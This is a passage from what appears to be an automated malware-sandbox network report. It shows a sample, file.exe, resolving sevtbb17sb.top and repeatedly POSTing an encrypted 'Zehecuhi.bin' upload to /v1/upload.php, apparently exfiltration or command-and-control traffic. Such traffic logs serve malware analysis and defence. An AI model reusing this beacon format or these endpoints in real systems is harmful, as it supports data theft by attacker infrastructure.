Oct 20, 2024 22:48:33.652652979 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.652698040 CEST	49941	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:33.653019905 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.653090000 CEST	49941	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:33.653110027 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.653119087 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.654162884 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.657263041 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.657270908 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.657299042 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.657351017 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.657454014 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.657759905 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:33.705056906 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:34.967948914 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:34.968084097 CEST	49941	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:34.974231005 CEST	80	49941	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:34.974294901 CEST	49941	80	192.168.2.4	193.46.218.44

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 20, 2024 22:47:12.262213945 CEST	55667	53	192.168.2.4	1.1.1.1
Oct 20, 2024 22:47:12.959408045 CEST	53	55667	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 20, 2024 22:47:12.262213945 CEST	192.168.2.4	1.1.1.1	0x2167	Standard query (0)	sevtbb17sb.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 20, 2024 22:47:12.959408045 CEST	1.1.1.1	192.168.2.4	0x2167	No error (0)	sevtbb17sb.top		193.46.218.44	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sevtbb17sb.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:13.013921022 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:13.013966084 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:14.289542913 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:14.289577007 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:15.576843023 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:15.576879025 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:17.054780960 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:17.054819107 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:18.351844072 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:18.351876974 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:19.602190018 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:19.602190971 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49737	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:20.853209019 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:20.853241920 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49739	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:22.103779078 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:22.103831053 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49742	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:23.414269924 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:23.414292097 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49744	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:24.665781021 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:24.665817022 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:25.931168079 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:25.931201935 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49749	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:27.164822102 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:27.164855957 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49751	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:28.444948912 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:28.444983959 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49753	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:29.695262909 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:29.695286036 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49755	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:31.042434931 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:31.042459965 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49757	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:32.305058002 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:32.305087090 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49758	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:33.932708025 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:33.932729006 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49759	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:35.195359945 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:35.195400000 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49760	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:36.539623022 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:36.539644003 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49761	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:37.789249897 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:37.789277077 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49762	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:39.337126017 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:39.337151051 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49763	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
